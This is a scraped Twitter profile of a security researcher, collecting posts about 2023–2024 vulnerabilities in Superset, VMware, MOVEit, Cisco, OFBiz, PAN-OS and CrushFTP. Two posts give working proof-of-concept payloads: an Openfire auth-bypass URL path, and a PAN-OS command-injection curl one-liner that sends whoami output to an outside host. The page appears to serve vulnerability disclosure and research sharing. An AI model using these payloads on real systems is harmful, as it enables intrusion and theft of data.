M4rtin Hsu (@_0xf4n9x_) 's Twitter Profile
M4rtin Hsu

@_0xf4n9x_

CyberSec Enthusiast, Security Researcher, RedTeam, Security Automation, ❣️OpenSource

ID: 1144443853375590400

linkhttps://github.com/0xf4n9x calendar_today28-06-2019 03:14:12

253 Tweet

4,4K Followers

93 Following

Horizon3 Attack Team (@horizon3attack) 's Twitter Profile Photo

CVE-2023-27524, a dangerous default configuration in #Apache #Superset, allows an unauth attacker to: 🔺 Gain RCE 🔺 Harvest Creds 🔺 Compromise Data We estimate there are roughly 2K+ servers on the Internet affected by this issue. horizon3.ai/cve-2023-27524…

CVE-2023-27524, a dangerous default configuration in #Apache #Superset, allows an unauth attacker to:
🔺 Gain RCE
🔺 Harvest Creds
🔺 Compromise Data 

We estimate there are roughly 2K+ servers on the Internet affected by this issue.

horizon3.ai/cve-2023-27524…
Harsh Jaiswal (@rootxharsh) 's Twitter Profile Photo

CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC. nuclei Template - github.com/projectdiscove… cc Rahul Maini wvu !

CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC.

<a href="/pdnuclei/">nuclei</a> Template - github.com/projectdiscove… 

cc <a href="/iamnoooob/">Rahul Maini</a> <a href="/wvuuuuuuuuuuuuu/">wvu</a> !
Germán Fernández (@1zrr4h) 's Twitter Profile Photo

🚨 1/ Ongoing campaign primarily targeting security researchers here on Twitter. Possibly they are trying to exploit some vulnerability in Internet Explorer and database tools like Navicat. I haven't been able to get the malicious payload yet, but something fishy is going on 🤔

🚨 1/ Ongoing campaign primarily targeting security researchers here on Twitter.

Possibly they are trying to exploit some vulnerability in Internet Explorer and database tools like Navicat. I haven't been able to get the malicious payload yet, but something fishy is going on 🤔
Caitlin Condon (@catc0n) 's Twitter Profile Photo

Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to Ron Bowes, Stephen Fewer, and Curt Fielding for their work on this. attackerkb.com/topics/mXmV0Yp…

SinSinology (@sinsinology) 's Twitter Profile Photo

🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight. summoning.team/blog/vmware-vr…

🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight.
summoning.team/blog/vmware-vr…
M4rtin Hsu (@_0xf4n9x_) 's Twitter Profile Photo

#CVE-2023-32315 Openfire Admin Console Auth Bypass #POC: /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp Ref: github.com/advisories/GHS… Credit to Siebene@

#CVE-2023-32315 Openfire Admin Console Auth Bypass

#POC: 
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

Ref: github.com/advisories/GHS…

Credit to <a href="/Siebene7/">Siebene@</a>
watchTowr (@watchtowrcyber) 's Twitter Profile Photo

we're back - causing trouble with more enterprise-grade firewalls :-) join us on the journey... labs.watchtowr.com/yet-more-unaut…

we're back - causing trouble with more enterprise-grade firewalls :-) join us on the journey...

labs.watchtowr.com/yet-more-unaut…
Praetorian (@praetorianlabs) 's Twitter Profile Photo

F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclose this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve

Horizon3 Attack Team (@horizon3attack) 's Twitter Profile Photo

🔍 New POC Available! We’ve developed a Proof of Concept for CVE-2023-20198 in #Cisco IOS XE. This authentication-bypass allows an attacker to create new users with privilege level 15. Check out the details in horizon3.ai/cisco-ios-xe-c…

🔍 New POC Available! We’ve developed a Proof of Concept for CVE-2023-20198 in #Cisco IOS XE. This authentication-bypass allows an attacker to create new users with privilege level 15. Check out the details in horizon3.ai/cisco-ios-xe-c…
M4rtin Hsu (@_0xf4n9x_) 's Twitter Profile Photo

#CVE-2023-51467 Apache OFBiz auth bypass Groovy #RCE Vulnerability The vuln stems from an incomplete patch fix for the CVE-2023-49070, and a post-auth Groovy RCE.

#CVE-2023-51467 Apache OFBiz auth bypass Groovy #RCE Vulnerability

The vuln stems from an incomplete patch fix for the CVE-2023-49070, and a post-auth Groovy RCE.
Kali Linux (@kalilinux) 's Twitter Profile Photo

The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.

M4rtin Hsu (@_0xf4n9x_) 's Twitter Profile Photo

#CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Path Traversal -> File Write -> OS Command Injection POC: curl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'

M4rtin Hsu (@_0xf4n9x_) 's Twitter Profile Photo

A SSTI vulnerability in CrushFTP allows an unauthenticated attacker to read files from the file system outside of the VFS sandbox, bypass authentication to gain administrative access, and perform RCE on the server. attackerkb.com/topics/20oYjlm…

GitHub Security Lab (@ghsecuritylab) 's Twitter Profile Photo

🚀 CodeQL zero to hero part 3: Security research with CodeQL! Learn how to audit applications for vulnerabilities with CodeQL, tricks we can use for security research workflow, and how to find bugs in thousands of GitHub repos at once using MRVA. github.blog/2024-04-29-cod…

🚀 CodeQL zero to hero part 3: Security research with CodeQL! Learn how to audit applications for vulnerabilities with CodeQL, tricks we can use for security research workflow, and how to find bugs in thousands of GitHub repos at once using MRVA.

github.blog/2024-04-29-cod…